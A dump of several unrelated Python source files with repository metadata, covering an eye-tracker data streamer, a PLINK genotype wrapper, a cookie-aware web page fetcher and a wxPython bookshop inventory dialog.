sample.timestamp = int(time.time()) sample.channels.extend(self.extract_channels(gaze_data)) sample_count += 1 if sample_count == samples_per_packet: yield packet packet = variables_pb2.SampleVector() sample_count = 0 def tracking(self): return self._gaze_to_packets(self.connector.tracking()) def run(self): for sample_packet in self.tracking(): self._process_message(sample_packet) class DiscoveryContext(object): def __init__(self): self.condition = threading.Condition() self.eyetracker_info = None class ConnectionContext(object): def __init__(self): self.condition = threading.Condition() self.eyetracker = None class TrackingContext(object): def __init__(self): self.condition = threading.Condition() self.last_sample = None class TrackingConnector(object): def __init__(self): self.logger = logging.getLogger("eat_amplifier") self.eyetracker = None self.eyetracker_info = None self.tracking_context = None eye_tracking_io.init() self._detect_eyetracker() self._connect_to_eyetracker() def _detect_eyetracker(self): mainloop = eye_tracking_io.mainloop.MainloopThread() context = DiscoveryContext() browser = eye_tracking_io.browsing.EyetrackerBrowser(mainloop, self.browsing_callback, context) with context.condition: context.condition.wait(7) #mainloop.stop() if context.eyetracker_info: self.eyetracker_info = context.eyetracker_info else: raise Exception("No eyetracker found") browser.stop() def browsing_callback(self, _id, message, eyetracker_info, *args): context = args[0] if message == 'Found': with context.condition: context.eyetracker_info = eyetracker_info context.condition.notify() def _connect_to_eyetracker(self): mainloop = eye_tracking_io.mainloop.MainloopThread() context = ConnectionContext() eye_tracking_io.eyetracker.Eyetracker.create_async(mainloop, self.eyetracker_info, self.connect_callback, context) with context.condition: context.condition.wait(7) if context.eyetracker: self.eyetracker = context.eyetracker else: raise Exception("Could not connect to eyetracker") def connect_callback(self, _error, eyetracker, context): with context.condition: context.eyetracker = eyetracker context.condition.notify() def tracking(self): try: self.tracking_context = TrackingContext() self.eyetracker.StartTracking(None) self.eyetracker.events.OnGazeDataReceived += self.tracking_handler while True: with self.tracking_context.condition: self.tracking_context.condition.wait(0.03) last_sample = self.tracking_context.last_sample self.tracking_context.last_sample = None if last_sample: yield last_sample finally: self.eyetracker.events.OnGazeDataReceived -= self.tracking_handler self.eyetracker.StopTracking() def tracking_handler(self, _error, gaze): with self.tracking_context.condition: self.tracking_context.last_sample = gaze self.tracking_context.condition.notify() def upload_calibration(self, path): calibration_file = open(path, "rb") calibration = eye_tracking_io.converters.Calibration(calibration_file.read()) self.eyetracker.SetCalibration(calibration) if __name__ == "__main__": EtrAmplifierTobii(settings.MULTIPLEXER_ADDRESSES).run()
UTF-8
Python
false
false
2,013
14,353,780,716,428
bb9292b01d88bf9bae25fc5c1422204cdb532a9e
9033971d873728ed3f9ea16fafb82b474e4c8ba5
/magic/plink/plink_wrapper.py
ba619709668578b0c95583a4bf0fef0ca79bd43d
[]
no_license
dtgillis/MAGiC
https://github.com/dtgillis/MAGiC
a2c6ef75b06635eb91fc2d4e4ff767d64eaceb1c
6fc37d277ffab96603583f208de7339902d2370f
refs/heads/master
2016-09-10T01:34:52.713618
2014-12-10T02:22:24
2014-12-10T02:22:24
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
__author__ = 'dtgillis' import os class SampleGenotype(): def __init__(self, sample_list, genotype_list, snp_name): self.sample_list = sample_list self.genotype_list = genotype_list self.snp_name = snp_name class PlinkExecutableWrapper(): def __init__(self, plink_executable_path=None): self.plink_found = False if plink_executable_path is None: for path in os.environ["PATH"].split(os.pathsep): if os.path.isfile(path + os.sep + 'plink'): self.plink_exec = path + os.sep + 'plink' self.plink_found = True print self.plink_exec else: if os.path.isfile(plink_executable_path): self.plink_found = True self.plink_exec = plink_executable_path if self.plink_found: print "Found plink executable" def extract_snps_recode(self, map_file, ped_file, snp, tmp_dir): #form the command for the plink execution cmd = '{0:s} --noweb --ped {1:s} --map {2:s} --map3 --no-pheno --recodeA --snp {3:s}' \ ' --out {4:s}{5:s}{3:s} > /dev/null'.format(self.plink_exec, ped_file, map_file, snp, tmp_dir, os.sep) os.system(cmd) def parse_snp_recode_raw(self, snp, tmp_dir): recode_file = tmp_dir + os.sep + snp + '.raw' if not os.path.isfile(recode_file): print "error reading plink file {0:s}".format(recode_file) exit(1) lines = open(tmp_dir + os.sep + snp + '.raw', 'r').readlines() #splice out split_lines = [line.strip(os.linesep).split() for line in lines[1:]] genotype_list = [] sample_list = [] for record in split_lines: if record[-1] != 'NA': sample_list.append(record[0]) genotype_list.append(int(record[-1])) sample_genotype = SampleGenotype(sample_list, genotype_list, snp) return sample_genotype def clean_up_directory(self, tmp_dir, snp): file_start = tmp_dir + os.sep + snp for ext in ['.raw', '.nof', '.log']: if os.path.isfile(file_start + ext): os.remove(file_start + ext)
UTF-8
Python
false
false
2,014
6,992,206,785,053
ee04e78dd0900b3a9007d46a8182d17c2383554b
1014ce5222cadd7a4ea7f5c639f5a8602bd3cebc
/python-master/InterpreterOverridings.py
5df3daf94e89c21040d69ebe18e00655a55bade2
[]
no_license
schwidom/pl-lisp
https://github.com/schwidom/pl-lisp
4ad9dfdcb87868a07cb6a85534c7fca5d13456c3
ea67d08f63659ec37ed4da18bd498b631764eb3e
refs/heads/master
2021-01-01T05:37:45.908974
2012-09-08T14:42:12
2012-09-08T14:42:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class InterpreterOverridings: def __init__( self): self.ess_ess_pront= [] def ess_ess_print( self, *l): # baustelle : ueberschreiben auf PL-Lisp Basis waere hier sauberer 8c231655685648cc99e5b0bf3b0b8687 self.ess_ess_pront.append( l) def setInputString( self, input_string): # Leerstring funktioniert self.input_string= input_string self.eof= False def setEOF( self): self.eof= True def readTokenRawInput( self): if None==self.input_string and self.eof: raise EOFError() ret= self.input_string; self.input_string= None return ret def s_print( self, *l): pass
UTF-8
Python
false
false
2,012
5,557,687,714,775
e31ef63afdba35af7cc2b2c88518d1cfb0d8a05d
bed0cb41dbf51ab592ee7d72b931662c98c35a56
/test_base/__init__.py
12cc88f8ec55e0ac2317dfaa6464b5f4d714bf6e
[]
no_license
travisfischer/cqlengine-test-base
https://github.com/travisfischer/cqlengine-test-base
e9f75b926f237b8e0ade7e0ed2b104a16a6917e8
cd6c792cbdff638356fc9d6defb4fa6abb6246b5
refs/heads/master
2016-09-06T09:22:21.158906
2014-08-04T01:51:43
2014-08-04T01:51:43
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from keyspace_manager import PersistenceTestCase
UTF-8
Python
false
false
2,014
11,209,864,665,329
89abb5f3478bff167902c0defa1b6f213459a29e
febdd9a0b1a618ee51d716df59bb572c7e3cc2dd
/page_getter.py
4b59d47e96d98302d47928ba58d4799e1a43fd9a
[]
no_license
wiggin15/CookiePageGetter
https://github.com/wiggin15/CookiePageGetter
9478e53c8870ef9c81c26a26089ddf012d80da40
ef49b29731003c7b6250aa842deff075fdb7707d
refs/heads/master
2020-01-21T16:24:50.740458
2013-01-19T18:08:43
2013-01-19T18:08:43
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from __future__ import print_function import re import os import gzip try: from http.cookiejar import LWPCookieJar from urllib.parse import urlencode from urllib.request import build_opener, HTTPCookieProcessor, Request from io import BytesIO except ImportError: # Python 2.x from cookielib import LWPCookieJar from urllib import urlencode from urllib2 import build_opener, HTTPCookieProcessor, Request from StringIO import StringIO as BytesIO bytes = str COOKIEFILE = 'cookies.lwp' USER_AGENT = "Opera/9.80" #USER_AGENT = "Mozilla/5.0 (compatible; MSIE 7.0)" ### Logger ############################## class Logger(object): """ prints to stdout and optionally to a file """ def __init__(self, log_file=None): if log_file is not None: self.log_file = open(log_file, "wb") else: self.log_file = None def __del__(self): if self.log_file is not None: self.log_file.close() def log(self, text): try: print(text) except UnicodeEncodeError: pass # can't print unicode to console if self.log_file is not None: self.log_file.write((text + os.linesep).encode("utf-8")) self.log_file.flush() class SilentLogger(object): """ logger that doesn't log """ def log(self, text): pass ### CookiePageGetter #################### class CookiePageGetter(object): def __init__(self, username=None, password=None, cookiefile=None, logger=None): self.bandwidth = 0 self.logger = logger or SilentLogger() self.cookiefile = cookiefile or COOKIEFILE self.cj = LWPCookieJar() if os.path.isfile(self.cookiefile): self.cj.load(self.cookiefile) self.opener = build_opener(HTTPCookieProcessor(self.cj)) self.opener.addheaders = [("User-Agent", USER_AGENT)] self.opener.addheaders.append(("Accept-Encoding", "gzip")) if not os.path.isfile(self.cookiefile) and username is not None and password is not None: self.logger.log("Logging in") self.log_in(username, password) self.html_encoding = "utf-8" def log_in(self): pass def _read_in_chunks(self, response): data = bytes() while True: small_data = response.read(1024) self.bandwidth += len(small_data) if len(small_data) == 0: break data += small_data return data def _open_with_retry(self, request): # sometimes there are timeouts and such - try to open the page 10 times until giving up for i in range(10): try: response = self.opener.open(request) if i != 0: self.logger.log("* Recovered from open error after %d tries" % i) return response except: pass return None def _prepare_request(self, request, additional_headers, post_data): if additional_headers is not None: for k, v in additional_headers.items(): request.add_header(k, v) if post_data is not None: request.add_data(urlencode(post_data).encode("ascii")) def _request(self, url, additional_headers=None, post_data=None): request = Request(url) self._prepare_request(request, additional_headers, post_data) response = self._open_with_retry(request) if response is None: self.logger.log("* ERROR Could not open <%s>" % url) return bytes() data = self._read_in_chunks(response) self.cj.save(self.cookiefile) # handle gzip'd data if response.info().get("Content-Encoding") == "gzip": gzip_stream = BytesIO(data) gzip_file = gzip.GzipFile(fileobj=gzip_stream) data = gzip_file.read() self._update_encoding(response) return data def get_page_html(self, url, additional_headers=None, post_data=None): data = self._request(url, additional_headers, post_data) data = data.decode(self.html_encoding) return data def download_binary(self, url, fname): data = self._request(url) open(fname, "wb").write(data) def _update_encoding(self, response): content_type = response.info().get('content-type') if content_type is None: return matchobj = re.search("charset=([^;]+)", content_type) if matchobj is None: return self.html_encoding = matchobj.group(1) def _format_size(self, bytes): suffixes = ['T', 'G', 'M', 'K', ''] bytes = [bytes] for i in range(len(suffixes)-1): bytes = list(divmod(bytes[0], 1024)) + bytes[1:] return ', '.join(["%d %sB" % (val, suf) for val, suf in zip(bytes, suffixes) if val != 0]) def log_bandwidth(self): self.logger.log("%s transferred" % (self._format_size(self.bandwidth)))
UTF-8
Python
false
false
2,013
987,842,486,858
57bedfb9dcf5af58e6aff41ed34429292f401e88
9e29e4542bfec6ec132f723b9e51beb681718659
/experimental/flavors/adapter.py
4be78be135eb72da5901ecd650060ce47bf9a12e
[]
no_license
seanupton/experimental.flavors
https://github.com/seanupton/experimental.flavors
3f4a1fa8afa29493b46ae087d2d91a4db137fca2
068e94e9452020e7aff7273ce2df51a7dc3c41ff
refs/heads/master
2016-08-04T20:54:44.375901
2012-07-19T20:55:11
2012-07-19T20:55:11
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from plone.behavior.interfaces import IBehavior from plone.dexterity.behavior import DexterityBehaviorAssignable from zope.annotation.interfaces import IAnnotations from zope.component import adapts, queryUtility import interfaces class FlavorBehaviorAssignable(DexterityBehaviorAssignable): """ Locally stored flavors for instance plus behaviors for FTI. Flavor names are behavior names: both reference the same dotted name of behavior interface, so enumeration can just use the flavor name without looking up an IFlavor utility to get metadata (since that metadata is for display, its primary use is in vocabularies, not here). """ adapts(interfaces.IFlavorAware) def __init__(self, context): self.flavor_names = [] self.context = context super(FlavorBehaviorAssignable, self).__init__(context) anno = IAnnotations(context) if interfaces.FLAVORS_KEY in anno: self.flavor_names = list(anno.get(interfaces.FLAVORS_KEY)) def enumerateBehaviors(self): behaviors = list(self.fti.behaviors) + self.flavor_names for name in behaviors: behavior = queryUtility(IBehavior, name=name) if behavior is not None: yield behavior
UTF-8
Python
false
false
2,012
3,693,671,889,006
781096e15129060dd0266fe01ad3bf46f5e5a3f9
6cfffd460857c9f959a5f55f9c78a49273dfff47
/plot_lena_meanshift.py
f0d6edda10dc92c6833925ffe3559384fb664896
[]
no_license
NelleV/IMANU
https://github.com/NelleV/IMANU
4ed04d686671456d3b9a3c90b2b25fd1d76ba350
a11c7c4f1f079ab13abfd7e72dfafef9f597ee39
refs/heads/master
2016-09-05T10:53:22.257754
2012-01-16T17:20:49
2012-01-16T17:20:49
2,651,919
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" ============================================ Segmenting Lena into region using mean shift ============================================ """ # Author: Nelle Varoquaux <[email protected]> # License: BSD import numpy as np import scipy as sp from matplotlib import pyplot as plt from mpl_toolkits.mplot3d import Axes3D from sklearn.cluster.mean_shift_ import MeanShift, estimate_bandwidth from sklearn.externals.joblib import Memory mem = Memory(cachedir='.') def calculate_cluster(lena, lena_mat, quantile): bandwidth = estimate_bandwidth(lena_mat, quantile=quantile, n_samples=500) ms = MeanShift(bandwidth=bandwidth, bin_seeding=True) ms.fit(lena_mat) labels = ms.labels_ cluster_centers = ms.cluster_centers_ labels_unique = np.unique(labels) n_clusters_ = len(labels_unique) lena_clustered = lena.copy() lena_clustered_value = lena.copy() lena_mat_clustered = lena_mat.copy() lena_mat_clustered_value = lena_mat.copy() for point, pointb, value in zip(lena_mat_clustered, lena_mat_clustered_value, labels): point[2] = value pointb[2] = cluster_centers[value, 2] lena_clustered[point[0], point[1]] = value lena_clustered_value[point[0], point[1]] = cluster_centers[value, 2] image = {"image": lena_clustered_value, "quantile": quantile, "clusters": n_clusters_} return image lena = sp.misc.lena() # My computer is crap - I don't have enough ram to compute the clustering on # the whole lena image. Let's downsample the image by a factor of 4 #lena = lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2] + lena[1::2, 1::2] #lena = lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2] + lena[1::2, 1::2] # Lena as an image is useless. Let's create a 512*3 matrix (x, y, value) lena_mat = [] for x, i in enumerate(lena): for y, j in enumerate(i): lena_mat.append([x, y, j]) lena_mat = np.array(lena_mat) quantile_range = np.linspace(0.004, 0.02, 11) images = [] images.append({"image": lena.copy(), "quantile": 0, "clusters": 0}) for i, quantile in enumerate(quantile_range): print "%d calculating for quantile %f" % (i, quantile) image = mem.cache(calculate_cluster)(lena, lena_mat, quantile) images.append(image) fig = plt.figure() for i, image in enumerate(images): ax = fig.add_subplot(4, 3, i) ax.set_axis_off() ax.set_title('clusters: %d - quantile %f' % (image['clusters'], image['quantile'])) ax.matshow(image['image']) #fig = plt.figure(1) #ax = fig.add_subplot(111, projection='3d') # #ax.plot(lena_mat[:, 0], lena_mat[:, 1], lena_mat[:, 2], 'w', #markerfacecolor='#111111', marker='.') # #plt.show() # # Let's display some of the results
UTF-8
Python
false
false
2,012
1,065,151,921,575
f816d6c3cfeeb0de5725305341a455f84df09c78
01854de172ef95a2583c3b43d52e69c684ac5c0f
/laser.py
9a7602b58a0d1055c83ad43020469fe31e8807e5
[ "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-proprietary-license" ]
non_permissive
dangillet/space_tactical
https://github.com/dangillet/space_tactical
261197bf3b06344e6505c80ec196ec79ccf47bf5
4c1e0b1757d7a1773ecd880567a6d0781f11d1f0
refs/heads/master
2016-09-10T23:38:42.137506
2013-11-10T14:12:47
2013-11-10T14:12:47
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from cocos import draw class LaserBeam(draw.Canvas): def __init__(self): super(LaserBeam, self).__init__() self.pos_from = (0,0) self.pos_to = (0,0) self.visible = False def render(self): self.set_endcap( draw.ROUND_CAP ) self.set_color( (255,0,0,200) ) self.set_stroke_width( 5 ) self.move_to(self.pos_from); self.line_to(self.pos_to) self.set_color( (255,180,180,200) ) self.set_stroke_width( 2 ) self.move_to(self.pos_from); self.line_to(self.pos_to)
UTF-8
Python
false
false
2,013
7,997,229,113,067
a9c2c70199bc64cbdfbb66d7533ede972638db58
4ffc4143729753ebc392b66d3e87a5c68976151a
/parseresults_iperf.py
c3674c8e7420e268ffaf4e8ed1e99fa58f797a78
[]
no_license
initiumsys/ansible-checkinf
https://github.com/initiumsys/ansible-checkinf
386749d75b07e4d7bb7b30f68a186b58695b244c
77f3cd2c7b5bce46d31de84f063f3e9970a37376
refs/heads/master
2021-05-19T19:38:19.948471
2014-07-08T10:28:54
2014-07-08T10:28:54
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import sys import os, fnmatch import re import sys, getopt def main(argv): inputpath = '' outputfile = '' typefiles = '' try: myopts, args = getopt.getopt(sys.argv[1:],"i:o:t:") except getopt.GetoptError as e: print (str(e)) print ("Usage %s -t [imas_a | imas_b] -i <inputpath> -o <outputfile>" % sys.argv[0]) sys.exit(2) for opt, arg in myopts: if opt == '-h': print ("Usage %s -t [imas_a | imas_b] -i <inputpath> -o <outputfile>" % sys.argv[0]) sys.exit() elif opt in ("-i", "--ipath"): inputpath = arg elif opt in ("-o", "--ofile"): outputfile = arg elif opt in ("-t", "--ttype"): typefiles = arg #print 'Input path is "', inputpath #print 'Output file is "', outputfile #print 'Type is "', typefiles # print("%s\t %s\t %s\t %s\t%s" % # ("HOST","Transfer","Bandwith","Jitter","Losts / Total")) fout = open(outputfile, 'w') fout.write("%s\t %s\t %s\t %s\t%s\t%s\n" % ("Host","Transfer","Bandwith","Jitter","Losts / Total", "Result")) for dirpath, dirs, files in os.walk(inputpath): for filename in fnmatch.filter(files, typefiles+"*"): #fout.write(filename+"\n") with open(os.path.join(dirpath, filename)) as f: # one file open, handle it, next loop will present you with a new file #fout.write(f.read()) for line in f: matchFile = re.match( r'imas_[a|b]_(.*)', filename, re.M|re.I) #[ 3] 0.0-30.0 sec 2.78 GBytes 797 Mbits/sec 0.034 ms 241/58595 (0.41%) matchObj = re.match( r'.* sec (.*ytes) (.*its/sec) (.*ms) (.*) \((.*)%\)', line, re.M|re.I) if matchFile and matchObj: errores = float(matchObj.group(5)) hayErrores = "OK" if errores > 0.1: hayErrores = "ERROR !!!" # print("%s %s %s\t%s %s (%s%s)\t%s" % # (matchFile.group(1), # matchObj.group(1), # matchObj.group(2), # matchObj.group(3), # matchObj.group(4), # matchObj.group(5), # "%", # hayErrores)) fout.write("%s %s %s\t%s %s (%s%s)\t%s\n" % (matchFile.group(1), matchObj.group(1), matchObj.group(2), matchObj.group(3), matchObj.group(4), matchObj.group(5), "%", hayErrores)) fout.close() if __name__ == "__main__": main(sys.argv[1:])
UTF-8
Python
false
false
2,014
7,851,200,238,086
88c081efcd8f10d217e45dc28de75e8773642278
778d56550129d127b048ef227a5cc2cf8dec4418
/popups/inventory.py
75a3afb07026fe2ac6a13ca7404dfc80b54233d5
[ "GPL-2.0-only" ]
non_permissive
johm/infoshopkeeper
https://github.com/johm/infoshopkeeper
aeccc1a20ec33e0f53ca9470a722d6572ac24b36
cb06b1ff89dbc5a850afbc801357cf651867e0e0
refs/heads/master
2016-09-06T11:11:52.551777
2012-10-20T23:25:48
2012-10-20T23:25:48
2,958,444
5
2
null
null
null
null
null
null
null
null
null
null
null
null
null
# Copyright 2006 John Duda # This file is part of Infoshopkeeper. # Infoshopkeeper is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or any later version. # Infoshopkeeper is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # You should have received a copy of the GNU General Public License # along with Infoshopkeeper; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from objects.kind import Kind from objects.author import Author from wxPython.wx import * from infoshopkeeper_config import configuration from popups.author import ChooseAuthorsPopup import urllib import string from controls.multiplePrices import multiplePrices import os cfg = configuration() bookStatus = cfg.get("bookStatus") econoscan=cfg.get('econoscan') try: if os.uname()[0]=="Linux": ON_LINUX=True # : ) else: ON_LINUX=False except: ON_LINUX=False # :( class InventoryPopup(wxDialog): def __init__(self,parent): self.known_title=False self.parent=parent self.trailing_two=False self.selected_kind = cfg.get("default_kind") if isinstance(bookStatus, tuple): self.statuses=bookStatus else: self.statuses = False self.keybuffer="" wxDialog.__init__(self, parent,-1,"Merchandise Details") # self.SetBackgroundColour("FIREBRICK") self.SetSize((400, 570)) self.master_sizer=wxBoxSizer(wxVERTICAL) self.toprow=wxBoxSizer(wxHORIZONTAL) self.toprow_col1=wxBoxSizer(wxVERTICAL) self.toprow_col2=wxBoxSizer(wxVERTICAL) self.static0=wxStaticText(self, -1, "Item ID (UPC or ISBN):") self.number=wxTextCtrl(id=-1,name="merchandise_id", parent=self, style=wxTE_PROCESS_ENTER) EVT_TEXT(self,self.number.GetId(), self.OnText) EVT_TEXT_ENTER(self,self.number.GetId(), self.OnTextEnter) if ON_LINUX: EVT_CHAR(self.number, self.OnKeyDown) self.toprow_col1.Add(self.static0,0,wxEXPAND|wxALL,5) self.toprow_col1.Add(self.number,0,wxEXPAND|wxALL,5) self.static0a=wxStaticText(self, -1, "Quantity:") self.quantity=wxTextCtrl(id=-1,name="quantity", parent=self, style=0) self.quantity.SetValue("1") self.toprow_col2.Add(self.static0a,0,wxEXPAND|wxALL,5) self.toprow_col2.Add(self.quantity,0,wxEXPAND|wxALL,5) self.toprow.Add(self.toprow_col1,0,wxEXPAND|wxALL,5) self.toprow.Add(self.toprow_col2,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.toprow,0,wxEXPAND|wxALL,5) self.row2=wxBoxSizer(wxHORIZONTAL) self.static1=wxStaticText(self, -1, "Title:") self.description=wxTextCtrl(id=-1,name="merchandise_description", parent=self, style=0) self.row2.Add(self.static1,0,wxGROW,5) self.row2.Add(self.description,1,wxGROW,5) self.master_sizer.Add(self.row2,0, wxGROW,5) self.prices=multiplePrices(self) self.prices.addPage(page_name="list price",master=True) for m in cfg.get("multiple_prices"): self.prices.addPage(page_name=m[0],proportion_of_master=m[1]) self.prices.render() self.master_sizer.Add(self.prices.mp_sizer,1,wxEXPAND|wxALL, 5) self.row4=wxBoxSizer(wxHORIZONTAL) self.static3=wxStaticText(self, -1, "Publisher:") self.publisher=wxTextCtrl(id=-1,name="merchandise_publisher", parent=self, style=0) self.row4.Add(self.static3,0,wxEXPAND|wxALL,5) self.row4.Add(self.publisher,1,wxGROW) self.master_sizer.Add(self.row4, 0, wxGROW,5) self.row5 = wxBoxSizer(wxHORIZONTAL) self.static4=wxStaticText(self, -1, "Author:") self.moreAuthor = wxButton(self, -1, "More authors", (110, 500)) EVT_BUTTON(self, self.moreAuthor.GetId(), self.OnMoreAuthor) self.author=wxTextCtrl(id=-1,name="merchandise_author", parent=self, style=0) self.row5.Add(self.static4,0,wxEXPAND|wxALL,5) self.row5.Add(self.author,1,wxGROW,5,1) self.row5.Add(self.moreAuthor,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.row5, 0, wxGROW,5) self.row6 = wxBoxSizer(wxHORIZONTAL) self.static5=wxStaticText(self, -1, "Category:") self.category=wxTextCtrl(id=-1,name="merchandise_category", parent=self, style=0) self.row6.Add(self.static5,0,wxEXPAND|wxALL,5) self.row6.Add(self.category,1,wxGROW,5,1) self.master_sizer.Add(self.row6,0,wxGROW,5) self.row7 = wxBoxSizer(wxHORIZONTAL) self.static6=wxStaticText(self, -1, "Distributor:") self.distributor=wxTextCtrl(id=-1,name="merchandise_distributor", parent=self, style=0) self.row7.Add(self.static6,0,wxEXPAND|wxALL,5) self.row7.Add(self.distributor,1,wxGROW,5,1) self.master_sizer.Add(self.row7, 0, wxEXPAND|wxALL,5) self.static7=wxStaticText(self, -1, "Owner:") self.owner=wxTextCtrl(id=-1,name="merchandise_owner", parent=self, style=0) self.owner.SetValue(cfg.get("default_owner")) self.master_sizer.Add(self.static7,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.owner,0,wxEXPAND|wxALL,5) if self.statuses: self.static8=wxStaticText(self, -1, "Status:") self.status=wxRadioBox(id=-1,name="Radio box 1", parent=self, choices = self.statuses ) self.master_sizer.Add(self.static8,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.status,0,wxEXPAND|wxALL,5) kinds=["%s" % k.kindName for k in list(Kind.select())] self.static8=wxStaticText(self, -1, "Kind:") self.kind=wxChoice(id=-1,name="merchandise_kind", parent=self,choices=kinds,style=0) position = self.kind.FindString(self.selected_kind) self.kind.SetSelection(position) self.master_sizer.Add(self.static8,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.kind,0,wxEXPAND|wxALL,5) self.static9=wxStaticText(self, -1, "Notes:") self.notes=wxTextCtrl(id=-1,name="merchandise_notes", parent=self, style=0) self.master_sizer.Add(self.static9,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.notes,0,wxEXPAND|wxALL,5) self.b = wxButton(self, -1, "Add and continue", (15, 500)) EVT_BUTTON(self, self.b.GetId(), self.OnAddAndContinue) self.b2 = wxButton(self, -1, "Add and quit", (110, 500)) EVT_BUTTON(self, self.b2.GetId(), self.OnAddAndQuit) self.b3 = wxButton(self, -1, "Cancel", (110, 500)) EVT_BUTTON(self, self.b3.GetId(), self.OnCancel) self.bottomrow=wxBoxSizer(wxHORIZONTAL) self.bottomrow.Add(self.b,1,wxGROW, 5) self.bottomrow.Add(self.b2,1,wxGROW, 5) self.bottomrow.Add(self.b3,1,wxGROW, 5) self.master_sizer.Add(self.bottomrow,0,wxEXPAND|wxALL,5) self.statusBar = wxStatusBar(self, -1, name="statusBar") self.master_sizer.Add(self.statusBar,0,wxEXPAND|wxALL,5) self.number.SetFocus() self.Fit() self.SetSizer(self.master_sizer) self.SetAutoLayout(1) self.master_sizer.Fit(self) def OnKeyDown(self,event): keycode = event.GetKeyCode() if event.AltDown() == 1: print keycode if len(self.number.GetValue())==0: self.trailing_two=False self.keybuffer= "%s%s" % (self.keybuffer,keycode-48) if len(self.keybuffer) == 2 and econoscan: if len(self.number.GetValue())==12: if self.keybuffer=='05': self.number.SetValue(self.number.GetValue() + "%s" % (2)) self.trailing_two=True if len(self.keybuffer) == 3: keybuffer_as_int= int(self.keybuffer) - 48 if self.trailing_two: self.number.SetValue(self.number.GetValue()[:-1]) self.number.SetValue(self.number.GetValue() + "%s" % (keybuffer_as_int)) if econoscan and keybuffer_as_int==2: self.keybuffer="0" else: self.keybuffer="" else: event.Skip() def OnMoreAuthor(self, event): win = ChooseAuthorsPopup(self, self.OnGetAuthors) btn = event.GetEventObject() pos = btn.ClientToScreen( (0,0) ) sz = btn.GetSize() win.CenterOnScreen() win.ShowModal() win.Destroy() def OnGetAuthors(self, authors): authorstring=Author.get(authors.pop(0)).author_name.decode("string_escape") for author in authors: # we make a string ! authorstring = authorstring + "," + Author.get(author).author_name.decode("string_escape") self.author.SetValue(authorstring) def OnTextEnter(self,event): self.known_title=False id=self.number.GetValue() if (len(id) == 10 or len(id) == 13): item=self.parent.inventory.lookup_by_isbn(id) else: item=self.parent.inventory.lookup_by_upc(id) if item['known_title']: self.known_title=item['known_title'] if item['title']: self.number.SetEditable(False) self.description.SetValue(item['title']) self.prices.pages['list price'].price_ctrl.SetValue("%s" % (item['list_price'])) self.prices.update_pages(None) self.author.SetValue(item['authors_as_string']) self.category.SetValue(item['categories_as_string']) self.publisher.SetValue(item['publisher']) self.number.SetValue(item['isbn']) def OnText(self,event): id=self.number.GetValue() if len(id) == 13: self.OnTextEnter(event) def OnCancel(self,event): self.EndModal(1) def OnAddAndContinue(self,event): desc = self.description.GetValue() self.AddBook(event) self.statusBar.SetStatusText("%s added to book list" % desc) def OnAddAndQuit(self,event): if self.AddBook(event): self.OnCancel(event) def AddBook(self,event): description=self.description.GetValue() try: price_raw=self.prices.pages['list price'].price_ctrl.GetValue() price_corrected=string.replace(price_raw,"$","") price = float(price_corrected) except Exception,e: price=0 if len(description) > 0 and price > 0: #here we get values and add to inventory author_as_string=self.author.GetValue() authors=string.split(author_as_string,",") categories_as_string=self.category.GetValue() categories=string.split(categories_as_string,",") publisher=self.publisher.GetValue() distributor=self.distributor.GetValue() owner=self.owner.GetValue() notes=self.notes.GetValue() isbn=self.number.GetValue() quantity=self.quantity.GetValue() kind=self.kind.GetStringSelection() if self.statuses: status=self.status.GetSelection() writtenStatus = self.statuses[status] else: writtenStatus = "" extra_prices={} for m in cfg.get("multiple_prices"): mprice_raw=(self.prices.pages[m[0]]).price_ctrl.GetValue() mprice_corrected=string.replace(mprice_raw,"$","") mprice = float(mprice_corrected) print "mprice was %s" % mprice extra_prices[m[0]]=mprice self.parent.inventory.addToInventory(title=description,status=writtenStatus,authors=authors,publisher=publisher,price=price,isbn=isbn,categories=categories,distributor=distributor,quantity=quantity,known_title=self.known_title,kind_name=kind,extra_prices=extra_prices,owner=owner,notes=notes) self.quantity.SetValue("1") self.description.SetValue("") self.prices.pages['list price'].price_ctrl.SetValue("0.0$") self.author.SetValue("") self.notes.SetValue("") self.category.SetValue("") self.publisher.SetValue("") self.number.SetValue("") self.number.SetFocus() self.known_title=False self.number.SetEditable(True) return True; else: dlg = wxMessageDialog(self, "Fill in (at least) title and price correctly !", "Error", wxICON_ERROR|wxOK) dlg.ShowModal() return False;
UTF-8
Python
false
false
2,012
4,621,384,847,121
90d4ca0d03a1867bda149d0280ba821e747cb797
64013ee4edeea93417e1043096d81e4ac4aa9e82
/src/octopus/worker/process.py
9b47741417c4776ac2e3603ed5c609d759ac9c55
[ "BSD-3-Clause" ]
permissive
samson-jerome/OpenRenderManagement
https://github.com/samson-jerome/OpenRenderManagement
ca349deaf3228ecb8672beeb9de0a495e17476ac
e8f2b27d6b273f0c5b201999caaf0c39b67cbf3d
refs/heads/master
2021-01-22T06:32:47.697751
2014-11-21T18:55:12
2014-11-21T18:55:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
